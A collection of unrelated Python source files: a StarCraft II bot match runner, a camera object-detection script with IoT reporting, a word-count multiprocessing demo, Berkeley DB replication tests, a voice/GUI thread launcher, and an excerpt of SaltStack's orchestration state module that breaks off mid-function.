self.data = {}
# List of games, e.g. ["basic_bot,T,python,loser_bot,T,python,AcropolisLE"]
self.games_queue = deque()
self.runner = GameRunner()
def start_server(self):
if os.name == "nt":
# Comment out for linux, TODO use import platform
self.server_process = Process(target=run_server, args=[False])
self.server_process.daemon = True
self.server_process.start()
def stop_server(self):
if os.name == "nt":
self.server_process.terminate()
def __enter__(self):
self.start_server()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop_server()
def add_games_to_queue(self, games: List[str]):
for game in games:
self.games_queue.append(game)
def read_ladderbots(self, directory: Path, exclude_names: Set[str]):
botdir: Path
bots: List[str] = []
for botdir in [x for x in directory.iterdir() if x.is_dir()]:
for file in [x for x in botdir.iterdir() if x.is_file()]:
if str(file).endswith("ladderbots.json"):
with open(str(file)) as f:
contents = json.load(f)
bots_data: dict = contents["Bots"]
for bot_name, bot_data in bots_data.items():
if bot_name.lower() in exclude_names:
continue
bot_race = bot_data["Race"][0]
bot_type = bot_data["Type"]
bots.append(",".join([bot_name, bot_race, bot_type]))
break
return bots
def generate_games_list(self, bot1_list: List[str], bot2_list: List[str], map_list: List[str]) -> List[str]:
"""
Generates games list, every bot from 'bot1_list' will be matched against every bot from 'bot2_list' on every map in 'map_list'.
Example input:
generate_games_list(["CreepyBot,Z,python"], ["basic_bot,T,python", "loser_bot,T,python], ["AcropolisLE", "TritonLE"])
"""
games = []
for bot1_string in bot1_list:
for bot2_string in bot2_list:
for map_name in map_list:
games.append(",".join([bot1_string, bot2_string, map_name]))
return games
async def run_local_games(self):
while self.games_queue:
games = [self.games_queue.popleft()]
await self.runner.run_local_game(games, self.data)
async def main():
# Alternatively you can use start_server() and stop_server()
with RunLocal() as run_local:
# Not needed, default: realtime=False and visualize=False
run_local.data = {"Realtime": False, "Visualize": False}
# If you want to let your bot play vs multiple bots, edit the following
# path = Path("/root") / "StarCraftII" / "Bots"
# bot1_list = ["CreepyBot,Z,python"]
# bot2_list = run_local.read_ladderbots(path, exclude_names={"creepybot", "basic_bot", "loser_bot"})
# print(f"Generated bot2_list: {bot2_list}")
bot1_list = ["loser_bot,Z,python"]
bot2_list = ["basic_bot,Z,python"]
map_list = ["TritonLE"]
"""
"python": ["run.py", "Python"],
"cppwin32": [f"{bot_name}.exe", "Wine"],
"cpplinux": [f"{bot_name}", "BinaryCpp"],
"dotnetcore": [f"{bot_name}.dll", "DotNetCore"],
"java": [f"{bot_name}.jar", "Java"],
"nodejs": ["main.jar", "NodeJS"],
"Python": ["run.py", "Python"],
"Wine": [f"{bot_name}.exe", "Wine"],
"BinaryCpp": [f"{bot_name}", "BinaryCpp"],
"DotNetCore": [f"{bot_name}.dll", "DotNetCore"],
"Java": [f"{bot_name}.jar", "Java"],
"NodeJS": ["main.jar", "NodeJS"],
"""
# Generates all possible map and bot combinations
games = run_local.generate_games_list(bot1_list, bot2_list, map_list)
# If you only want to play a specific game:
# games = ["basic_bot,T,python,loser_bot,T,python,AcropolisLE"]
# Add games to queue
run_local.add_games_to_queue(games)
await run_local.run_local_games()
if __name__ == "__main__":
asyncio.run(main())
|
detect_obj.py
|
import sys
import cv2
import time
from multiprocessing import Process
from multiprocessing import Queue
from PIL import Image
from screen import Screen
from camera import MyCamera, RawCapture
from labels import Labels
from classify import classify_frame
from display import set_window, set_bonding_box, set_label, set_label_text, display_show, display_destroy
from iot_watson import IoT
# Misc vars
queuepulls = 0.0
detections = 0
label_txt = None
fps = 0.0
qfps = 0.0
confThreshold = 0.75
# -------------------------------------------SCREEN SIZE-------------------------------------------------------------
screen = Screen()
# -------------------------------------------------------------------------------------------------------------------
# --------------------------------------------CAMERA-----------------------------------------------------------------
# Initialize the camera and grab a reference to the raw camera capture
camera = MyCamera(screen.resolution.width, screen.resolution.height)
rawCapture = RawCapture(camera.my_camera, screen.resolution.width, screen.resolution.height)
# -------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------OD LABELS-------------------------------------------------------------
labels = Labels()
# -------------------------------------------------------------------------------------------------------------------
# noinspection PyBroadException
try:
# -----------------------------------DISPLAY WINDOW--------------------------------------------------------------
set_window(screen.resolution.width, screen.resolution.height)
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------INPUT(FRAME)/OUTPUT(RESULT DATA)---------------------------------------------
# Initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the detection thread
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
img = None
out = None
# ---------------------------------------------------------------------------------------------------------------
# ---------------------------------DETECTION THREAD--------------------------------------------------------------
# Create detection thread to run independent from main
detection_thread = Process(target=classify_frame, args=(inputQueue, outputQueue,))
detection_thread.daemon = True
detection_thread.start()
# ---------------------------------------------------------------------------------------------------------------
# ---------------------------------IoT---------------------------------------------------------------------------
# Connect to cloud
iot = IoT()
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------FRAME RATE-------------------------------------------------------------------
timer1 = time.time()
frames = 0
queuepulls = 0
timer2 = 0.
t2secs = 0.
# ---------------------------------------------------------------------------------------------------------------
# ----------------------------------CAMERA FRAMES----------------------------------------------------------------
for frame in camera.my_camera.capture_continuous(rawCapture.rawCapture, format="bgr", use_video_port=True):
if queuepulls == 1:
timer2 = time.time()
# Capture frame-by-frame
frame = frame.array
img = Image.fromarray(frame)
# If the input queue is empty, give the current frame to CLASSIFICATION
if inputQueue.empty():
inputQueue.put(img)
# If the output queue is not empty, grab the CLASSIFICATION result
if not outputQueue.empty():
out = outputQueue.get()
# Use CLASSIFICATION data
if out is not None:
# Loop over the detections
for detection in out:
if detection[0] == 0 or detection[0] == 16 or detection[0] == 17:
objID = detection[0]
label_txt = labels.my_labels[objID]
confidence = detection[1]
xmin = detection[2]
ymin = detection[3]
xmax = detection[4]
ymax = detection[5]
if confidence > confThreshold:
set_bonding_box(frame, xmin, xmax, ymin, ymax)
set_label(frame, label_txt, xmin, ymin)
set_label_text(frame, label_txt, confidence, xmin, ymin)
# Positive detections per frame not object
detections = True
else:
detections = False
label_txt = None
queuepulls += 1
# Display the resulting frame
display_show(frame, screen.resolution.width, screen.resolution.height)
# -----------------------------------------------------------------------------------------------------------
# FPS calculation
frames += 1
if frames >= 1:
end1 = time.time()
t1secs = end1 - timer1
fps = round(frames / t1secs, 2)
if queuepulls > 1:
end2 = time.time()
t2secs = end2 - timer2
qfps = round(queuepulls / t2secs, 2)
iot.send_data(fps, detections, label_txt)
# Clear the stream in preparation for the next frame
rawCapture.rawCapture.truncate(0)
# ------------------------------------CONTROLS---------------------------------------------------------------
keyPress = cv2.waitKey(1)
if keyPress == 113: # q
break
if keyPress == 82: # R
confThreshold += 0.1
if keyPress == 84: # T
confThreshold -= 0.1
if confThreshold > 1:
confThreshold = 1
if confThreshold < 0.4:
confThreshold = 0.4
# ----------------------------------------------------------------------------------------------------------
# ----------------------------------------CLOSE WINDOW AND CAMERA-----------------------------------------------
display_destroy()
camera.my_camera.close()
iot.disconnect_client()
except:
print("Unexpected error:", sys.exc_info()[0])
display_destroy()
camera.my_camera.close()
|
manager.py
|
import os
import sys
import time
from collections import defaultdict
from multiprocessing import Process, Lock, Manager
processes = [ ]
file = open('article', mode = 'r')
lines = file.read().split('.')
file.close()
manager = Manager()
bag = manager.dict()
lock = manager.Lock()
delims = manager.list([',', ';', ':', '-', '.'])
def bag_of_words(line, l, d, delims):
my_dict = defaultdict(int)
for d in delims:
line = line.replace(d, ' ')
for word in line.split():
my_dict[word] += 1
lock.acquire()
for key, value in my_dict.iteritems():
try:
bag[key] += value
except KeyError:
bag[key] = value
lock.release()
time1 = time.time()
for line in lines:
p = Process(target=bag_of_words, args=(line, lock, bag, delims,))
processes.append(p)
p.start()
for p in processes:
p.join()
time2 = time.time() - time1
print bag
print("Time = {0}".format(time2))
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
client_port = test_support.find_unused_port()
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
# this fails on Windows as self.client_startupdone never gets set
# to True - see bug 3892. BUT - even though this assertion
# fails on Windows the rest of the test passes - so to prove
# that we let the rest of the test run. Sadly we can't
# make use of raising TestSkipped() here (unittest still
# reports it as an error), so we yell to stderr.
import sys
if sys.platform=="win32":
print >> sys.stderr, \
"XXX - windows bsddb replication fails on windows and is skipped"
print >> sys.stderr, "XXX - Please see issue #3892"
else:
self.assertTrue(time.time()<timeout)
d = self.dbenvMaster.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], client_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], master_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
def setUp(self) :
DBReplicationManager.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
main_program.py
|
import tkinterGUI
import voiceRecognition
import threading
class main_program():
def __init__(self):
voice_thread = threading.Thread(target = voiceRecognition.main, args = "")
gui_thread = threading.Thread(target = tkinterGUI.GUIapp, args = "")
print ("stahting")
voice_thread.start()
print ("between statements")
gui_thread.start()
print ("in between")
#voice_thread.join()
#print ("ending statements")
#gui_thread.join()
main_program()
|
saltmod.py
|
# -*- coding: utf-8 -*-
'''
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
'''
from __future__ import absolute_import, unicode_literals, print_function
# Import python libs
import fnmatch
import logging
import sys
import threading
import time
# Import salt libs
import salt.syspaths
import salt.exceptions
import salt.output
import salt.utils.data
import salt.utils.event
from salt.ext import six
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'salt'
def __virtual__():
'''
Named salt
'''
return __virtualname__
def _fire_args(tag_data):
try:
salt.utils.event.fire_args(__opts__,
__orchestration_jid__,
tag_data,
'run')
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
def _parallel_map(func, inputs):
'''
Applies a function to each element of a list, returning the resulting list.
A separate thread is created for each element in the input list and the
passed function is called for each of the elements. When all threads have
finished execution a list with the results corresponding to the inputs is
returned.
If one of the threads fails (because the function throws an exception),
that exception is reraised. If more than one thread fails, the exception
from the first thread (according to the index of the input element) is
reraised.
func:
function that is applied on each input element.
inputs:
list of elements that shall be processed. The length of this list also
defines the number of threads created.
'''
outputs = len(inputs) * [None]
errors = len(inputs) * [None]
def create_thread(index):
def run_thread():
try:
outputs[index] = func(inputs[index])
except: # pylint: disable=bare-except
errors[index] = sys.exc_info()
thread = threading.Thread(target=run_thread)
thread.start()
return thread
threads = list(six.moves.map(create_thread, six.moves.range(len(inputs))))
for thread in threads:
thread.join()
for error in errors:
if error is not None:
exc_type, exc_value, exc_traceback = error
six.reraise(exc_type, exc_value, exc_traceback)
return outputs
def state(name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
highstate=None,
sls=None,
top=None,
saltenv=None,
test=None,
pillar=None,
pillarenv=None,
expect_minions=True,
fail_minions=None,
allow_fail=0,
exclude=None,
concurrent=False,
timeout=None,
batch=None,
queue=False,
subset=None,
orchestration_jid=None,
**kwargs):
'''
Invoke a state run on a given target
name
An arbitrary name used to track the state execution
tgt
The target specification for the state run.
.. versionadded: 2016.11.0
Masterless support: When running on a masterless minion, the ``tgt``
is ignored and will always be the local minion.
tgt_type
The target type to resolve, defaults to ``glob``
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
highstate
Defaults to None, if set to True the target systems will ignore any
sls references specified in the sls option and call state.highstate
on the targeted minions
top
Should be the name of a top file. If set state.top is called with this
top file instead of state.sls.
sls
A group of sls files to execute. This can be defined as a single string
containing a single sls file, or a list of sls files
test
Pass ``test=true`` or ``test=false`` through to the state function. This
can be used to overide a test mode set in the minion's config file. If
left as the default of None and the 'test' mode is supplied on the
command line, that value is passed instead.
pillar
Pass the ``pillar`` kwarg through to the state function
pillarenv
The pillar environment to grab pillars from
.. versionadded:: 2017.7.0
saltenv
The default salt environment to pull sls files from
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
allow_fail
Pass in the number of minions to allow for failure before setting
the result of the execution to False
exclude
Pass exclude kwarg to state
concurrent
Allow multiple state runs to occur at once.
WARNING: This flag is potentially dangerous. It is designed
for use when multiple state runs can safely be run at the same
Do not use this flag for performance optimization.
queue
Pass ``queue=true`` through to the state function
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
.. versionadded:: 2016.3.0
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
asynchronous
Run the salt command but don't wait for a reply.
NOTE: This flag conflicts with subset and batch flags and cannot be
used at the same time.
.. versionadded:: neon
Examples:
Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
minions:
.. code-block:: yaml
webservers:
salt.state:
- tgt: 'web*'
- sls:
- apache
- django
- core
- saltenv: prod
Run sls file via :py:func:`state.sls <salt.state.sls>` on target
minions with exclude:
.. code-block:: yaml
docker:
salt.state:
- tgt: 'docker*'
- sls: docker
- exclude: docker.swarm
- saltenv: prod
Run a full :py:func:`state.highstate <salt.state.highstate>` on target
mininons.
.. code-block:: yaml
databases:
salt.state:
- tgt: role:database
- tgt_type: grain
- highstate: True
'''
cmd_kw = {'arg': [], 'kwarg': {}, 'ret': ret, 'timeout': timeout}
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
state_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
try:
allow_fail = int(allow_fail)
except ValueError:
state_ret['result'] = False
state_ret['comment'] = 'Passed invalid value for \'allow_fail\', must be an int'
return state_ret
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
if 'roster' in kwargs:
cmd_kw['roster'] = kwargs['roster']
cmd_kw['expect_minions'] = expect_minions
cmd_kw['asynchronous'] = kwargs.pop('asynchronous', False)
if highstate:
fun = 'state.highstate'
elif top:
fun = 'state.top'
cmd_kw['arg'].append(top)
elif sls:
fun = 'state.sls'
if isinstance(sls, list):
sls = ','.join(sls)
cmd_kw['arg'].append(sls)
else:
state_ret['comment'] = 'No highstate or sls specified, no execution made'
state_ret['result'] = False
return state_ret
if test is not None or __opts__.get('test'):
cmd_kw['kwarg']['test'] = test if test is not None else __opts__.get('test')
if pillar:
cmd_kw['kwarg']['pillar'] = pillar
if pillarenv is not None:
cmd_kw['kwarg']['pillarenv'] = pillarenv
if saltenv is not None:
cmd_kw['kwarg']['saltenv'] = saltenv
if exclude is not None:
cmd_kw['kwarg']['exclude'] = exclude
cmd_kw['kwarg']['queue'] = queue
if isinstance(concurrent, bool):
cmd_kw['kwarg']['concurrent'] = concurrent
else:
state_ret['comment'] = ('Must pass in boolean for value of \'concurrent\'')
state_ret['result'] = False
return state_ret
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
masterless = __opts__['__role'] == 'minion' and \
__opts__['file_client'] == 'local'
if not masterless:
_fire_args({'type': 'state', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
else:
if top:
cmd_kw['topfn'] = ''.join(cmd_kw.pop('arg'))
elif sls:
cmd_kw['mods'] = ''.join(cmd_kw.pop('arg'))
cmd_kw.update(cmd_kw.pop('kwarg'))
tmp_ret = __salt__[fun](**cmd_kw)
cmd_ret = {__opts__['id']: {
'ret': tmp_ret,
'out': tmp_ret.get('out', 'highstate') if
isinstance(tmp_ret, dict) else 'highstate'
}}
if cmd_kw['asynchronous']:
state_ret['__jid__'] = cmd_ret.get('jid')
state_ret['changes'] = cmd_ret
if int(cmd_ret.get('jid', 0)) > 0:
state_ret['result'] = True
state_ret['comment'] = 'State submitted successfully.'
else:
state_ret['result'] = False
state_ret['comment'] = 'State failed to run.'
return state_ret
try:
state_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
no_change = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
state_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
if not cmd_ret and expect_minions:
state_ret['result'] = False
state_ret['comment'] = 'No minions returned'
return state_ret
for minion, mdata in six.iteritems(cmd_ret):
if mdata.get('out', '') != 'highstate':
log.warning('Output from salt state not highstate')
m_ret = False
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_state = True
if mdata.get('failed', False):
